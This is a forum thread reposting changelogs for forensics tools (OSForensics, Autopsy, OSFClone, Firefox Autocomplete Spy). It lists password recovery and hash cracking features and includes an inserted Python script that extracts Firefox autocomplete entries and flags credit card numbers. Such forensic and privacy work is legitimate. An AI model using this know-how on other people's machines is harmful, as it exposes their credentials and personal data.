        During indexing, fixed Total Bytes/Peak Physical Memory/Peak Virtual Memory not updating properly when > 2GB
        Fixed crash bug with buffer overflow and infinite add URL when indexing .MSG file with many attachments
        Fixed bug with only using last filename for all attachments of the same .MSG file
        Fixed bug with losing generated body text with attachment filenames "Attachment(s): ... , ..." for .MSG file indexed.
        Fixed bugs with indexing plain text emails in .MSG files
        Fixed bugs with indexing Chinese PST files (metafield length limit caused Unicode corruption)
        Fixed bug with possible Unicode string corruption when longer than available buffer (with languages such as Chinese with 4 char MB UTF-8 characters)
        Fixed a bug with files sizes not being indexed in offline mode
        Fixed a potential crash caused by long URLS
        Fixed a crash during pre-scanning when indexing unallocated clusters
        Fixed bug with search index failing on old format index files after a search with new format index files.
        Fixed DOCX plugin that split words incorrectly due to revision history
        Fixed crash bug with XLS files with invalid cell.templateID values
    Import Hash
        Fixed String/Buffer overflow during import progress updates (if import folder name is too long) by increasing string size
    Internal Viewer
        If viewing an excel document that is password protected it will now display a relevant error message
    Password Recovery
        Shadow copy now used if registry file is locked
    Recent Activity
        Now attempting to get the localised name for the "Documents and Settings" folder from the registry when starting a recent activity scan so more information will be retrieved on non-English Windows installations.
        Shadow copy now used if registry file is locked
        Should now resolve shortcut (.lnk) files in User's Recent Items folder (when not using live acquisition scan option).
        Fixed scanning of system registry hives when no user hives are found
    Search Index
        Fixed processing of FILETYPE_MSG and FILETYPE_ATTACHMENT_MSG index results
    System Information
        Shadow copy now used if registry file is locked
    ThumbCache Viewer
        When looking up default Windows.edb location, now using localised folder names instead of hard-coded locations
    WinPE Builder
        Updated build of WinPE Builder. (Allows user to set NTFS filesystem with command line argument '-f'. Not enabled by default, since FAT32 supports booting both BIOS-based and UEFI-based PCs. UEFI based systems require that the boot files reside on FAT32 partition. If they are not on FAT32 the system may not see the device as bootable.)
    Misc
        Fixed bug with handling of NTFS files with mix of compressed/non-compressed fragments
        Help file updates

http://www.osforensics.com/
Titel: OSForensics 3.1.1005
Beitrag von: SiLæncer am 18 Februar, 2015, 12:24
Changelog

File Indexing

    Updated Zoom indexer to fix some crash issues
    Bug fixes when indexing DOC and XLS files inside ZIP files

Install to USB

    WinPEBuilder will launch with option to format USB drive filesystem as NTFS.

Password Recovery (Browser Passwords)

    Fixed a bug with Chrome and Opera password recovery where the wrong password could be displayed in some cases (out by 1 place in the list) or no password might be displayed despite not being blacklisted

System Information

    Fixed a bug that was displaying an error message when trying to run a custom command on the system information tab when using a selected drive

http://www.osforensics.com/
Titel: OSForensics 3.1 Build 1006
Beitrag von: SiLæncer am 05 März, 2015, 09:13
Changelog

Case Manager:

Before deleting search indexes they will now be unloaded if currently in use rather than displaying an error message

Email Viewer:

Added check for if the recipient address is in X400 format. If so, try to obtain the SMTP Address instead.

File Indexing:

Fixed a crash caused by partially compressed NTFS drives
Fixed bug with missing title and from addresses from index
Fixed bug with PST files not opening from search results due to incorrect/corrupt path
Fixed bug with X400 email address format when SMTP format available for recipients.

Password Recovery:

Windows login passwords: Added recovery of cached domain users, updated help file to match new UI and functions.

Install to USB:

Fixed a bug where if the initial start failed (e.g. invalid target directory) the disabled buttons were not re-enabled, causing OSF to become unusable

Misc:

Updated error message when trying to copy files to clipboard from non supported devices

http://www.osforensics.com/
Titel: OSForensics 3.1 Build 1007
Beitrag von: SiLæncer am 04 Mai, 2015, 09:06
Changelog

Case Log:
Added preliminary implementation of Case activity logging
Case Management:
Made add note window resizable
Added vertical and horizontal scrollbars to Add note dialog, allowing more data to be saved and making it easier to format the notes.
Deleted files:
Fixed crash when displaying deleted file thumbnails on ext2/HFS+ drives (due to different threads sharing same drive handle)
Hash Sets:
Fixed bug in deleting hash set from Tree View
Web Browser:
Fixed missing URL info when adding web snapshot to case
WinPEBuilder:
Can pass in .cfg file to preload some values of WinPEBuilder.exe
Install to USB:
Updated GUI. If installing to USB Drive, then only USB location will be allowed. If creating a bootable device, then any folder is allowed. OSForensics will prefill the output destination of OSForensics (via WinPE Builder config file) when launching WinPE Builder (Requires WinPE Builder 1.0.107 and up).
Misc:
Updated System information library

http://www.osforensics.com/
Titel: OSForensics 3.2.1000
Beitrag von: SiLæncer am 10 Juni, 2015, 13:36
Changelog


    Create Index
        Added indexing of From, To, CC, BCC, etc. fields for PST attachments.
        Added indexing of From/CC/To etc. addresses from MSG attachments.
        Added missing support for indexing headers for MSG files
        The start and end dates for the advanced search options are now correctly using the current case timezone setting when a search is performed
        Fixed bug in Create Index -> Edit Template -> "Scan system paging and hibernation files" setting being lost.
        Fixed bug with Search Index -> Email Attachments -> Export ... results carrying incorrect From/To/CC information from previous results.
        Fixed bug with indexing attachments from MSG files (failing to recognize file type properly)
        Fixes for crashes and infinite loops when indexing corrupt DOC, XLS and PPT files.
        Fixed bug with empty emails in PST files causing previous buffer to be used for content and custom meta.
    Case Manager
        User can now specify whether logging is enabled/disabled when creating or editing a case
        Error message is displayed if the log file is corrupted or tampered with
        When generating a report, added "No title" when there was no title for an item so the link to the file is visibly created
        When renaming (moving) cases, case items still used the old metafile path causing issues with non-existent paths. Fixed by reloading case after moving.
        E-mail attachment paths now include the attachment index number, due to the possibility of having multiple attachments with the same name
    Case Log
        Supplemental log entries added across all modules
        When logging is disabled, controls are now disabled and message is shown to the user
    Create/Verify Hash
        Fixed drive drop down list to include Case devices
    CSV Exports
        Removed "," separator between date and times for CSV exports so that Excel will automatically pick them up as dates
    Deleted Files
        Fixed bug with retrieving the clusters of a deleted NTFS file. This bug can potentially cause an invalid memory access crash
        Unallocated cluster information now being used for mounted devices
        Fixed bug with unable to save multiple deleted files from a partition without a drive letter (due to invalid characters in the device path)
        The number of files that were not saved due to reallocation now displayed
        Improved performance of saving deleted NTFS files
        Deleted files stored in multiple MFT records are now being handled
        Proper stream names are being used when restoring a deleted NTFS file
    Disk Imaging
        Fixed no default drive being selected in 'Hidden Areas - HPA/DCO' tab
        Added check for no physical disk selected
        The sizes of each respective max LBA are now displayed in the log after detecting HPA/DCO
    Event Info
        Bug fix, stripped trailing space character from event title.
    Email Viewer
        A dotted border is now custom drawn on the selected folder/e-mail so that even when the control loses focus, the selection is still apparent
        Fixed not being able to add multiple e-mail attachments with the same name. Each attachment now has a unique path.
    File Name Search
        Added 'Save to disk' right-click option. Re-arranged right-click menu to be more readable
    Hash sets
        Files less than 5 bytes in size are now excluded from hash set lookups (this is to prevent tiny files, e.g. 0-byte files, always appearing in a hash set where there was a 0-byte file on creation)
    Password Recovery (Windows Login Passwords)
        Added cached domain users to recovery for local drives
        Fixed a crash that could happen when recovering cached domain users
    Recent Activity
        Added timestamps to WLAN items for the associated XML profile or registry key (where available)
        Bug fix, export event to CSV will now include the item's title.
        Columns will remember their widths when filtering, sorting and navigating to different activity types.
    Search Index
        Added To/From/CC information to attachment output when searching an index
        Removed the from/to/cc fields from the CSV export of a search for items that aren't emails/attachments
        Fixed bug with broken links in search index results for files containing percent encoding in filename
    System Information
        Added cached domain users to "Get User Info (registry)"
    ThumbCache Viewer
        Fixed 'In Case' flag incorrectly displayed for all items in thumbnail view
    User Interface
        List/tree views across OSF now show the selected item regardless of when the control loses focus
        Fixed drawing issues when minimizing navigation buttons
        Removed flickering when resizing window
        Fixed buttons not being displayed when resizing window
        Fixed drawing issues when resizing file/folder popup dialog
    WinPEBuilder
        Bug Fix. Selecting OSForensics or BurnInTest as the selected program in WinPEBuilder will now add the required WinPE packages on the WinPE/Packages tab.
    Misc
        Updated help for new Case Activity Log section to describe logging feature
        Updated help with info on user editable file carving configuration file, osf_filecarve.conf
        Updated help to mention timezone in case management
        Updated System information library

http://www.osforensics.com/
Titel: OSForensics 3.2.1001
Beitrag von: SiLæncer am 22 Juni, 2015, 12:19
Changelog
Case Manager

    E-mail attachment paths now include the attachment index number following the file name (eg. c:\email.pst*990*attach.txt:2). This is to distinguish multiple attachments with the same name.

Create Index

    Fixed some bugs relating to email attachments
    New URL format for attachments
    Fixed bugs with indexing attachments from mbox (.eml) in nested format
    Fixed bug with not indexing From/To details for Mbox attachments
    Fixed bug with indexing attachment titles incorrectly
    Fixed a bug that was causing "Failed to rename file zoom_pagedata.tmp to ..." to appear at end of indexing

Email Viewer

    When extracting e-mail details, if FILETYPE_UNKNOWN is specified as the e-mail file type, the function will try opening the file with each format until successful
    Fixed potential heap corruption when exporting an e-mail with a large text body
    Fixed possible memory leak

Recent Activity

    Added shellbag item from registry files collection and display
    Fixed a date conversion issue with Google chrome downloads date

Search Index

    Fixed some results not being filtered into the correct tab (eg. images in e-mail attachments)
    E-mail attachments with the same name can now be distinguished properly
    When doing bulk adding of items to case, user is no longer prompted when the item already exists in the case after checking the 'Repeat action' checkbox.
    Fixed various problems related to adding nested attachments/e-mails/archives to case.
    For E-mail paths that do not have a message ID in the path, a message ID of "0" is assigned
    Fixed issues with the case flags not appearing for some items

Misc

    Fixed some date formatting bugs introduced in the previous build that were causing dates to appear blank

http://www.osforensics.com/
Titel: OSForensics 3.2.1002
Beitrag von: SiLæncer am 28 August, 2015, 09:05
Changelog
Create Index:

Improved MSG/EML/MBOX indexing support. Now using MIMETIC.
Fixed many common errors and warning messages and file recognition
Fixed many issues with .zip, .gz, and .tar.gz archives. And recursive archives.
Fixed filter buttons/checkboxes not working when viewing a failed/cancelled index
Added fix for "Core engine is not responding" when indexer was stuck in "Finishing" stage due to large index or slow disk write

Email Viewer:

Added right-click option to jump to the message ID of an e-mail file
Added progress details when scanning for deleted e-mails
Fixed bug with deleted e-mails not being displayed in the EmailViewer
Fixed 'assert' error appearing when Subject field is missing in MIME headers

Index Log Viewer:

Fixed crash when trying to view a previous index log while an indexing job is running.

Recent activity:

Fixed an issue when trying to get IE10+ URLs from a read only drive
Fixed an issue with "dirty" IE10+ databases that were displaying a "Failed to attach IE10 database" error in some cases
Fixed an "autofill_dates" missing error caused by a Chrome update removing this table
Fixed a "malformed" database error when getting Chrome cookie information
Fixed some display and sorting issues with shellbag items on the file details tab

Registry Viewer:

Fixed a crash when opening a corrupt registry file

Misc:

exFAT partitions are now properly detected as opposed to being identified as "Unknown"

http://www.osforensics.com/
Titel: OSForensics 3.2 Build 1003
Beitrag von: SiLæncer am 07 Oktober, 2015, 12:21
Changelog
Create Index:

Added support for zipx, 7z, rar, .arj, .dmg, .iso, .chm, .cab, .bz2, .lzo
Fixed indexing bug with repeated "Core engine not responding" messages

Disk Imaging:

Reduced the vertical space used by the controls to support lower resolutions

EmailViewer:

Can now re-scan for recovered e-mails after cancelling a previously started scan
Removed 'Tools' menu

Misc:

Help updates for system information

http://www.osforensics.com/
Titel: Autopsy 4.0.0
Beitrag von: SiLæncer am 24 Januar, 2016, 13:00
(http://s26.postimg.org/mm0ohnggp/screenshot_130.jpg)
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

What's new:

Multi-user cases supported that allow collaboration using network-based services.
Image Gallery feature released.
Assorted minor fixes and enhancements.

http://www.sleuthkit.org/autopsy/desc.php
Titel: OSForensics 3.3 Build 1000
Beitrag von: SiLæncer am 04 Februar, 2016, 12:32
Changelog

Case Management:

Increased Notes character limit to 64000 characters
Can now remove file from case in right-click menu
When adding an attachment to case that already exists, prompt the user to overwrite

Create Signature:

E-mail files are no longer saved as temporary files when creating a hash of the file. This improves the speed when creating a signature.
Fixed wrong directory path being displayed especially when hashing large files.
Fixed performance bug when hashing NTFS compressed files. Caused a 20x slowdown reading compressed files.

Compare Signature:

When comparing file attributes, mask out the extra attributes used by OSForensics Forensics mode (eg. FILE_ATTRIBUTE_ATTR_MODIFY). This gives a more accurate list of modified files.

Deleted File Search:

Added 'Remove deleted file from case' right-click menu option
Fixed search results clearing when flags are updated

Drive Preparation:

Added WAIT icon to drive refresh, so user can see when refresh is complete.
Fixed physical drives are now supported, including system drive. However, if the system drive is selected, an error message is displayed

Drive Imaging:

By default, 'Verify Image File' and 'Disable Shadow Copy' checkboxes are now checked.
Added option to attach Image metadata (.info) file to case on completion
Changed extension of Image metadata file from .info to .info.txt

Email Viewer:

When parsing DBX e-mail files in forensics mode, a temporary copy of the file is no longer created. This saves some time opening the file.

ESEDB viewer:

Updated the Extensible Storage Engine database (ESEDB) viewer to support the new Win10 file structure.
Fixed list of records being cleared when attempting to access a page that is out of bounds
Fixed bug with non NULL-terminated string
Added sanity check for endianness for Vista DBs due to possibility of fields being either big or little endian

File Indexer:

12x increased unique words capacity (from 16 million base words to 200 million). Allows more documents to be indexed in a single index.
Approximate 5x faster Forensics Mode indexing. This resulted from better caching, better parsing of the MFT and new low overhead methods of getting file attributes.
Improved JPG, PNG image indexing speed with new methods of calling exiftool. Performance is approximately 5x faster on photographic images.
Fixed bugs with indexing of archives (zip, tar, 7z, etc.) in Forensics Mode.
Added support for ZIP files using non-DEFLATE methods (e.g. IMPLODE)
Improved file type identifications and attempted indexing methods. A lot fewer warnings and errors should now be logged when indexing.
Fixed 64-bit bugs with 7z64.dll
Fixed corrupt messages e.g. "Error: Cannot delete output file: ... ". Sometimes this error was caused by indexing E-mails that contained malware. The antivirus (AV) solutions running on machines would detect the malware on extraction of attachments from the E-mail and unexpectedly delete the temporary file, causing a cascade of errors. We have a work around for the errors, but active AV solutions can still prevent indexing of files containing malware. Which can be a good or bad thing depending on your point of view.
Fixed failing to open .gz and .tar.gz files from forensic mode mounted drive
Fixed bugs with failing to extract files from certain problematic ZIPs and attempting every file (with magic and extraction and indexing) causing 3 error messages per file in the Zip file. Corrupted Zip files should no longer produce this cascade of errors.
Fixed crash bug with truncated MP3 files
Fixed OLE parsing bug when loading corrupted MSG Email file
Improved memory estimation of indexing, to better judge if there is sufficient RAM available to start the indexing job. No point starting an indexing job only to die half way through it.

File Name Search:

Fixed 'Current Folder' not being correctly displayed
Fixed search results clearing when flags are updated

File System Browser:

Display "(Sparse)" for the "Starting LCN" column of sparse files
Fixed incomplete folder size being displayed when folder size calculation is cancelled midway (eg. when items are being sorted)
Speed improvement when calculating folder sizes in forensics mode. Approx 3x faster depending on collection of files.

Internal Viewer:

File info: For reparse points the linked path is now displayed
No longer displays message box when failing to open file
Hex viewer, Display error message in the status bar when failing to open file

Mismatch Search:

Fixed 'Current Folder' not being correctly displayed

Password Recovery:

Fixed crash when writing an entry to the log
Windows Login - List views are now resized
Windows Login - Added 'Password Required' column to 'Local Users' table to indicate whether a password is required for login
Windows Login - Fixed crash when saving local users/domain users to file

Recent Activity:

Added file type sub classification for Windows Search Items. Files are classified using the MIME type and extensions
Removed directories from Windows Search Items
Fixed Security event log entries not appearing in the results
Selected items in 'File Details' and 'File List' tabs are now independent of each other. This caused problems when the exported list of selected items contain items that were not selected
Re-arranged the order of tabs so that 'File Details' is the default tab.
Fixed scan status not displaying in 'File Details' view
Fixed sorting of items in 'File Details' view
Fixed flickering of tree view
Fixed error message appearing when JumpList is not selected in the scan
Fixed a shellbag retrieval crash in Windows 10
Fixed a jumplist crash in Windows 10
Fixed a bug preventing some jumplist items from being retrieved
Changed "Stream Number" jumplist item name to "Entry ID"
Fixed an offset bug when getting the name of a shellbag item in Windows 10 which caused names with invalid characters to appear
Updated function that retrieves Windows desktop search terms. The database format recently changed in Win10 and broke older releases of OSF.

Registry Viewer:

Can switch between Hex, ASCII, Unicode in right-click menu
Hives under \Windows\System32\config\RegBack are now listed when selecting a registry hive to open
Added buttons for common operations (Add file, Add to case, Export, Find)
Fixed a crash when trying to view/open the SAM file in Windows 10

Search Index:

Updated search engine code to support new increased capacity index format with extended unique words.
Added 'Remove item from case' right-click menu option
Fixed search results clearing when flags are updated

Thumbnail View:

Improved performance of loading photographic image thumbnails in forensics mode. Is approx 10x faster.
Improved speed + memory usage when drawing thumbnails. Especially noticeable when scrolling the display, which should now be smoother.

Drive imaging:

Fixed error "Unable to read end of drive". This occurred when imaging a volume (e.g. Drive F:), when the size of the file system (e.g. NTFS) is smaller than the volume size. The imaging process will now continue beyond the end of the file system to read the entire volume.

Misc:

Fixed some memory leaks found by the leak checker

Licensing:

In the free edition of the software,
The indexing process will be restricted to 10,000 files or E-mails.
The search results from an index will be limited to 250 files per search.
Only 10 items to be added to each Case file.
Only the first 10 passwords from each browser type will be listed in the passwords function

Installer:

The installer package is now signed with an Extended Validation code signing certificate. This avoids some SmartScreen installation warnings in Windows 10, like Windows "prevented an unrecognised app from starting".

http://www.osforensics.com/
Titel: OSForensics 3.3.1001
Beitrag von: SiLæncer am 09 Februar, 2016, 05:00
Changelog

Deleted Files Search

    File Carving: naming of recovered carved files has been changed to "Carved (type) file (Sector Location in HEX).extension", e.g. Carved 'jpg' file 0x00001F2B.jpg

File name search

    Fixed a bug that was preventing sort by foreground/background colour working correctly on results when OSForensics was using direct access (eg direct access of an image file)

Hash Sets

    Fixed a crash when first trying to open the hash sets tab

Misc

    Some help file updates

http://www.osforensics.com/
Title: OSForensics 3.3.1002
Post by: SiLæncer on 23 March, 2016, 13:00
Changelog

Deleted Files - FileCarving

    Fixed crash. The TIF file format has internal pointers to locations within the file; when these pointers contain a corrupted/invalid value, it could cause OSForensics to crash.
    Added slider to configuration to allow selection of start and end percent/location of drive to carve.
    Fixed possible crash when searching for HFS+ deleted files.

File Indexer

    New Zoom build, fixed issues with not starting indexing on HFS image with "Invalid folder" errors.

Misc

    Fixed retrieving file attributes on non-NTFS file systems
    Fixed possible crash when accessing HFS+ file systems
    Added detection of file system for MBR partitions due to possible differences in reported partition type and actual file system

http://www.osforensics.com/
Title: OSForensics 3.3.1003
Post by: SiLæncer on 06 April, 2016, 18:00
What's new:

Email Viewer

    Fixed stack overflow crash bug when saving MSG attachment with multiple levels of nesting

File Indexer

    New Zoom indexer build, fixed a crash bug for nested MSG files within PST files

http://www.osforensics.com/
Title: OSFClone 1.1.1000
Post by: SiLæncer on 07 April, 2016, 13:31
OSFClone is a free, self-booting solution which enables you to create or clone exact raw disk images quickly and independent of the installed operating system.

In addition to raw disk images, OSFClone also supports imaging drives to the open Advanced Forensics Format (AFF). AFF is an open and extensible format to store disk images and associated metadata. An open standard enables investigators to quickly and efficiently use their preferred tools for drive analysis. After creating or cloning a disk image, you can mount the image with PassMark OSFMount before conducting analysis with PassMark OSForensics™.

OSFClone creates a forensic image of a disk, preserving any unused sectors, slack space, file fragmentation and undeleted file records from the original hard drive. Boot into OSFClone and create disk clones of FAT, NTFS, and USB-connected drives! OSFClone can be booted from CD/DVD drives, or from USB flash drives.

Freeware

What's new:

Updated Tiny Core Linux to Core 7.0
Updated dc3dd to 7.2.641
Added HFS+ support (If journalled is enabled, drive/partition is read only).
Updated libewf to 20160329
USB image of OSFClone is now UEFI/BIOS bootable

http://osforensics.com/tools/create-disk-images.html
Title: OSForensics 3.3.1004
Post by: SiLæncer on 13 April, 2016, 09:11
Changelog

Case Manager

    Added warning when attempting to add the entire image to case when there is a partition table
    Allow the option to select the "entire image file" when adding images to case

File Indexer

    New Zoom builds with added recognition for extensions .plt and .dxf to index filename only
    Fixed stack/buffer overflow issue when indexing PST emails.

Raw disk viewer

    When viewing the raw sectors of entire images, the partition table info is now decoded

Search Index

    Fixed special characters such as '&' in the filepath from the search results not being decoded properly

Misc

    Device dropdown list now includes the image file's partition (or "Entire image")
    Fixed bug with not being able to read the raw bytes of image files using UNC paths
    Accessing the entire image file with a valid partition table (ie. without specifying a partition) no longer returns error

http://www.osforensics.com/
Title: OSFClone v1.1.1001
Post by: SiLæncer on 06 May, 2016, 09:00
What's new:

Fixed bug where you may not be able to select a partition as a source.
Will no longer mount the drive during scanning of available drives by default. As a consequence, OSFClone will no longer show disk space usage. To return to previous behavior, this can be re-enabled in the options.

http://osforensics.com/tools/create-disk-images.html
Title: Autopsy 4.1.0
Post by: SiLæncer on 24 July, 2016, 10:00
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

What's new:

New list view in Timeline tool
VMWare virtual machine files (vmdk) and Microsoft Virtual Hard Drives (vhd) can be added as data sources.
New ingest module detects vmdk and vhd files embedded in other data sources and adds them as data sources.
Text associated with blackboard artifacts is indexed and searched for keywords.
Custom (user-defined) blackboard artifact and attribute types are displayed in the UI and included in reports.
File size and MIME type conditions can be specified for interesting files set membership rules.
Assorted bug fixes and minor enhancements.

http://www.sleuthkit.org/autopsy/desc.php
Title: Autopsy 4.1.1
Post by: SiLæncer on 27 August, 2016, 16:00
What's new:

Bug fix to enable some Python modules to run again.

http://www.sleuthkit.org/autopsy/desc.php
Title: Firefox Autocomplete Spy 2.0
Post by: SiLæncer on 08 September, 2016, 19:00
Firefox Autocomplete Spy is a free tool to easily view and delete all your autocomplete data from the Firefox browser. Firefox stores Autocomplete entries (typically form fields) such as login name, email, address, phone, credit/debit card number, search history etc. in an internal database file.

'Firefox Autocomplete Spy' helps you to automatically find and view all the Autocomplete history data from the Firefox profile location. For each entry, it displays the following details:

    Field Name
    Value
    Total Used Count
    First Used Date
    Last Used Date

You can also use it to view a history file belonging to another user on the same or a remote system. It also provides a one-click solution to delete all the displayed Autocomplete data from the history file. It is very simple to use for everyone, which especially makes it a handy tool for forensic investigators.

Firefox Autocomplete Spy is fully portable and works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 10.

What's new:

Mega edition with the support for Windows 10 version. Added more features like right click context menu & fixed the sizing problem with higher resolution computers.

http://securityxploded.com/firefox-autocomplete-spy.php
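The "internal database file" the post refers to is the profile's formhistory.sqlite. As an added example (not code from the Firefox Autocomplete Spy tool), the script below reads the same five details the tool lists from that database, converting Firefox's microsecond timestamps, and flags card-like values so they can be purged first. It assumes Firefox's real moz_formhistory table layout; the in-memory sample database and its rows are constructed.

```python
"""Read Firefox form-history (autocomplete) entries from formhistory.sqlite.

Added example, not part of the Firefox Autocomplete Spy tool. Assumes the
real Firefox layout: the moz_formhistory table with fieldname, value,
timesUsed, firstUsed and lastUsed columns, timestamps in microseconds since
the Unix epoch (PRTime). The sample database below is constructed.
"""
import sqlite3
from datetime import datetime, timezone
from typing import Optional


def open_profile_db(path: str) -> sqlite3.Connection:
    """Open a profile's formhistory.sqlite read-only and immutable, so the
    examination never writes a journal/WAL file next to the evidence."""
    return sqlite3.connect(f"file:{path}?immutable=1", uri=True)


def prtime_to_utc(us: Optional[int]) -> Optional[datetime]:
    """PRTime is microseconds since 1970-01-01 UTC; NULL stays None."""
    if us is None:
        return None
    return datetime.fromtimestamp(us / 1_000_000, tz=timezone.utc)


def luhn_ok(digits: str) -> bool:
    """Luhn checksum, used only to flag values that look like card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def looks_like_card_number(value: str) -> bool:
    digits = value.replace(" ", "").replace("-", "")
    return digits.isdigit() and 13 <= len(digits) <= 19 and luhn_ok(digits)


def read_form_history(con: sqlite3.Connection) -> list:
    """Return the stored entries (most recently used first) with the fields
    an examiner wants: field name, value, use count, first/last used."""
    cur = con.execute(
        "SELECT fieldname, value, timesUsed, firstUsed, lastUsed "
        "FROM moz_formhistory ORDER BY lastUsed DESC"
    )
    entries = []
    for fieldname, value, times_used, first_used, last_used in cur:
        entries.append({
            "field": fieldname,
            "value": value,
            "times_used": times_used,
            "first_used": prtime_to_utc(first_used),
            "last_used": prtime_to_utc(last_used),
            # Card-like values are the entries a user most wants to purge.
            "possible_card_number": looks_like_card_number(value),
        })
    return entries


def build_sample_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a profile's formhistory.sqlite."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE moz_formhistory (id INTEGER PRIMARY KEY, "
        "fieldname TEXT NOT NULL, value TEXT NOT NULL, timesUsed INTEGER, "
        "firstUsed INTEGER, lastUsed INTEGER, guid TEXT)"
    )
    con.executemany(
        "INSERT INTO moz_formhistory (fieldname, value, timesUsed, firstUsed, lastUsed, guid) "
        "VALUES (?, ?, ?, ?, ?, ?)",
        [
            ("email", "alice@example.com", 5, 1_472_000_000_000_000, 1_473_000_000_000_000, "g1"),
            ("cc-number", "4111 1111 1111 1111", 1, 1_473_500_000_000_000, 1_473_500_000_000_000, "g2"),
            ("q", "train timetable", 2, 1_470_000_000_000_000, 1_471_000_000_000_000, "g3"),
        ],
    )
    con.commit()
    return con


if __name__ == "__main__":
    for e in read_form_history(build_sample_db()):
        flag = " [possible card number]" if e["possible_card_number"] else ""
        print(f'{e["last_used"]:%Y-%m-%d %H:%M:%S}  {e["field"]:<10} x{e["times_used"]}  {e["value"]}{flag}')
```

To run it against a real profile, copy formhistory.sqlite out of the profile folder first and pass the copy to open_profile_db.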

Title: Autopsy 4.2.0
Post by: SiLæncer on 28 October, 2016, 19:00
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

Changelog

Credit card account search.
Encoding/decoding of extracted files to avoid anti-virus alerts/quarantine.
Ingest history used to warn before doing redundant analysis.
Options panel for managing custom tag names.
Options panel for setting external viewer associations.
Keyboard shortcut for applying Bookmark tags.
Improved PhotoRec carver ingest module cancellation responsiveness.
Results content viewer formats dates.
Update to PostgreSQL 9.5.
Assorted bug fixes and minor enhancements.

http://www.sleuthkit.org/autopsy/desc.php
Title: OSForensics 4.0 Build 1000
Post by: SiLæncer on 10 November, 2016, 17:00
Changelog

Password recovery:

Wifi passwords are now recovered & decrypted from the registry and file system.
Windows auto-logon passwords are now recovered & decrypted from the registry.
Outlook & Windows live mail passwords are now recovered & decrypted.
Microsoft product keys are extracted from the Windows registry
New Configuration window has been added to allow the user to select what items are recovered, enter in an account password for offline decryption & select a dictionary for brute force attacks on the account password.
Specific rows in the password report can now be selected for export or adding to the case.
GPU accelerated hardware support for brute force password recovery on Office documents, PDF, Zip & RAR file. (Work in progress)
Support for new MS Office 2013 encryption standards for DOCX, PPTX, etc... (SHA512 hashing has been implemented in addition to SHA-1).
New columns in the report have been added for password strength & length, which can be useful when checking for compliance with password policies.
Added NTLM hash cracking to the common password check for the Windows login password
Added NTLM hash rainbow table generation.

User interface & work flow:

It is now possible to change the order of buttons in the left menu, now called the Work Flow menu. This allows the button order to reflect the chronological order of specific forensic processes.
Checkboxes in several windows, rather than multi-select that requires continuously holding select/ctrl.
New 'File Details' tab in several windows that displays the search results in a list view.

Recent activity artifacts:

Added mobile backups, lists the backups found from iTunes (e.g. iPod, iPad, and iPhone).
Updates in Recent Activity for newer browsers (including Edge)
Faster collection of Windows Search terms in recent activity (reducing hours to minutes for the worst case)
Added additional USB devices from SYSTEM\CurrentControlSet\Enum\USB in Recent activity
Added USB first connected time from parsing setupapi.dev.log
The ability to reorganize and/or hide show certain columns by right clicking on the column title area to configure it on the File Details tab was added.
GUI will show incrementing artefact count during the scan

File system support & imaging:

exFAT is now supported
Added read-support for .Ex01, .Lx01, and .L01 image formats
Improvements to HFS+ support for Macs.
Added the ability for users to create Logical images from the Forensic Copy feature. Logical images are created as a .VHD virtual disk & can be remounted back into OSF or manipulated with 3rd party tools.
Added a log option for Forensics Copy
Added ability to supply multiple source paths when performing Forensic Copy
Owner/group/permissions are now preserved in Forensic Copy
Better exposed the function to compare shadow copies.

Memory viewer:

The Memory Viewer has been overhauled. Now has 47 columns of metadata for all processes.
Handles and loaded Modules are displayed per process when available
Users can create Process Specific binary dumps through right click options and add to the case.

ESEDB Viewer:

Dialog to select from a list of known files now shows the file size
Added right-click option to copy values (ie. cells) to clipboard
Added right-click option to view values (ie. cells) as binary data in the internal viewer
Added right-click option to export values (ie. cells) as binary data to file
Added right-click option to export values (ie. cells) as binary data to case
Added right-click option to export tables to case
Fixed some memory allocation issues when exporting tables that can cause a crash
Fixed horizontal scroll bar not appearing for some tables
Binary data is now displayed in byte groupings
Fixed a bug when retrieving a record multi-value

File name search:

The user can now edit the list of pre-sets by editing the FileNameSearchPresets.txt file (in the C:\ProgramData\Passmark\OSForensics folder).
Peer to peer file types have been added as a new pre-set search selection.
The number of characters allowed in the search string field has been increased from 256 characters to 1023 characters.
Improved the default settings
Ability to group the search results by file type in 'File Details' view
When grouping the results by file type, the groups are collapsed by default

File indexing and searching:

Added image file EXIF header indexing for Camera Make Model, GPS date/time, GPS Latitude, and GPS Longitude
Improved relevance scoring when hundreds of matches are found within the same file
Restored torrent file indexing which got accidentally broken in a past release.
Fixed bug when indexing invalid file types (e.g. misnamed or corrupt files) causing incorrect content to be indexed.
Improved search results layout
Fixed bugs when indexing meta data (title, keywords, etc) from DOC files

Reporting & Case Management:

PDF output added.
New streamlined report layout, including a sidebar for quick access to specific forensic artifacts
Added option to include file EXIF metadata in the report
Custom logos are now easier to add
Added two custom fields to Case Information (The Edit Case and New Case windows) & allow the user to rename the fields
Added an 'Add External Report' feature in case management that supports adding an external HTML report directory to properly display other tools' reports.
Reduced the time required to populate the list of log entries
Index search history is now loaded on demand to reduce case load time.
File size of the case item is no longer retrieved to reduce case load time
The default mount name for volume shadows now contains the index number
When mounting devices, there is no longer an attempt to open a handle to the drive to reduce case load time.
When adding device to case, 'Case default device' checkbox is set by default
Improved error message when generating a report in a location that already contains an existing report
Fixed error when generating links in a report to a file that contains > 260 characters
Fixed forward slashes in links being escaped causing problems in some browsers (eg. Chrome)
Fixed error when deleting a read-only file from case
Fixed error when deleting a file with long file name from case
Added retry mechanism when attempting to add a file to case that is being used
When automatically adding files to case, added option to ignore future errors
Updated Report Templates to include the 'Case Activity Log' section in the main report
